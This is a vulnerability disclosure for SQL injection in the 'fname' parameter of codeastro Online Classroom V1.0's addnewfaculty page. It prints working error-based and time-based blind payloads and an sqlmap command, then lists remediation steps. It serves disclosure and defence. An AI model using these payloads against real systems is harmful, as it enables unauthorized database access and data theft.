# CVE-2024-XXXX: codeastro Online Classroom V1.0 SQL Injection Vulnerability ## Vulnerability Overview * **Vulnerability Name**: codeastro Online Classroom V1.0 /OnlineClassroom/addnewfaculty SQL Injection * **Vulnerability Type**: SQL Injection * **Affected File**: `/OnlineClassroom/addnewfaculty` * **Affected Version**: V1.0 * **Root Cause**: In the `addnewfaculty` file, the `'fname'` parameter does not properly sanitize or validate user input. It is directly concatenated into the SQL query, allowing attackers to inject malicious SQL code. ## Impact Scope * **Affected Product**: Online Classroom * **Potential Impact**: * Unauthorized database access * Leakage of sensitive data * Data tampering * Complete system compromise * Service disruption ## Proof of Concept (POC) **Payload 1 (Error-based):** ```sql fname=123' AND (SELECT 2065 FROM(SELECT COUNT(*),CONCAT(0x716a627071,(SELECT (ELT(2065=2065,1))),0x716a627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) ``` **Payload 2 (Time-based blind injection):** ```sql fname=123' AND (SELECT 7657 FROM (SELECT(SLEEP(5)))ZuG) AND 'VXWP'='VXWP&fname=123&addr=123&gender=123 ``` **SQLMap Test Command:** ```bash sqlmap -r 1.txt --batch ``` ## Remediation 1. **Use Prepared Statements and Parameter Binding**: Prepared statements separate SQL code from user input data, preventing SQL injection. 2. **Input Validation and Filtering**: Strictly validate and filter user input data to ensure it conforms to the expected format. 3. **Minimize Database User Privileges**: Ensure that the account used to connect to the database has the minimum necessary privileges, avoiding the use of accounts with elevated privileges (such as 'root' or 'admin') for daily operations. 4. **Regular Security Audits**: Conduct regular code and system security audits to promptly identify and remediate potential security vulnerabilities.